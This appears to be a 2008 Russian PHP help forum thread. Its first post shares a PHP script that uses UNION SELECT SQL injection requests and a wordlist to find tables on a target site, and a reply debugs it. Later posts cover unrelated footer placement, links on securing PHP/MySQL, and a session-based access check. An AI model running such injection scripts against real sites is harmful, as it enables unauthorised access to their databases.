Войти или зарегистрироваться
Выберите удобный способ — аккаунт создастся автоматически.
Или войдите по логину и паролю

16.05.2008, 17:17
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
С нами:
9650515
Репутация:
5
|
|
Подскажите где ошибка, вроде всё правильно, но не находит существующие столбцы в MYSQL!
<?
@set_time_limit(0);
$strverno=file_get_contents("site/index.php?id=1+UNION+SELECT+1,2,3,4,5,6,7,8,9+from +pro.users+limit+1,1/*");
preg_match_all("/<a href=\"(.+)\">(.+)<\/a>/isU",$strverno,$m);
foreach($m[2] as $s){
}
$fd = fopen("kol.txt", "r");
while(!feof($fd)) {
$ma=trim(fgets($fd));
$str=file_get_contents("site/index.php?id=1+UNION+SELECT+1,2,3,4,5,6,7,8,9+from +pro.".$ma."+limit+1,1/*");
preg_match_all("/<a href=\"(.+)\">(.+)<\/a>/isU",$str,$p);
foreach($p[2] as $k){
}
if($s==$k){
echo "ok, exist";
}
else {
echo "error";
}
}
fclose($fd);
?>
|
|
|

16.05.2008, 17:56
|
|
Участник форума
Регистрация: 26.02.2007
Сообщений: 259
С нами:
10107625
Репутация:
67
|
|
PHP код:
foreach($m[2] as $s){
}
foreach($p[2] as $k){
}
а это так и должно быть что цикл открылся и сразу закрылся, не выполняя никаких действий??
|
|
|

16.05.2008, 19:53
|
|
Постоянный
Регистрация: 18.10.2007
Сообщений: 461
С нами:
9770248
Репутация:
66
|
|
Привет всем
Подскажите пожалуйста как разместить <?php include("footer.inc");?> именно внизу страницы независимо от того сколько всякого на странице уже размещено - т.е. так чтоб футер всегд был только внизу страницы
спасибо
|
|
|

16.05.2008, 20:37
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами:
11058146
Репутация:
4536
|
|
в самый конец кода вставляй....
|
|
|

16.05.2008, 21:09
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
С нами:
9650515
Репутация:
5
|
|
Корвин
Да, цыкл возвращает $k=4, тоесть раскрутка масива и получение значения!
|
|
|

16.05.2008, 23:15
|
|
Постоянный
Регистрация: 22.03.2008
Сообщений: 325
С нами:
9545988
Репутация:
63
|
|
Плиз дайте хорошую ссылку про то 'Как обезопасить свой код (РHP+Mysql)' короче наверн поняли.. .
|
|
|

17.05.2008, 12:52
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами:
10058786
Репутация:
4589
|
|
Сообщение от Buffalon
Плиз дайте хорошую ссылку про то 'Как обезопасить свой код (РHP+Mysql)' короче наверн поняли.. .
http://www.php.su/security/
+ моск))
|
|
|

16.05.2008, 23:22
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами:
10172486
Репутация:
874
|
|
2 Buffalon
http://bvisoft.com/reads/263.php
Вот почитай, используя mysqli можеш забыть про СКЛ-инъекты
А вот общее по безопасности, мне понравилось 
http://www.1c-bitrix.ru/security/recommendations.php
|
|
|

17.05.2008, 03:24
|
|
Участник форума
Регистрация: 01.03.2006
Сообщений: 169
С нами:
10628635
Репутация:
78
|
|
Как осуществить авторизацию к определенным скриптам, на прямой доступ к скрипту что бы тебя отправляли на форму авторизации... Без использования .htpassw именно php скрипт... Приведите пож короткий пример, выжная часть вопроса, это как запретить доступ к опред скриптам...
|
|
|

17.05.2008, 04:27
|
|
Новичок
Регистрация: 06.12.2005
Сообщений: 8
С нами:
10750751
Репутация:
4
|
|
например так:
В каждом скрипте пишем(или же пишем в одном отдельном файле, на котором потом include поставить)
Смотрим авторизован ли юзер(смотря посредством чего идет авторизация, у меня пример проверки сессии):
PHP код:
<?
session_start();
if (!isset($_SESSION['login'])){
echo "Доступ запрещен. Авторизуйтесь";
exit;
}else{
//Тут можем сделать запрос в базу
//Посмотреть имеет ли данный юзер доступ к скрипту
//Естесственно, должна быть соответ. база
}
//далее сам скрипт
?>
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 74 (пользователей: 0 , гостей: 74)
|
|
|
|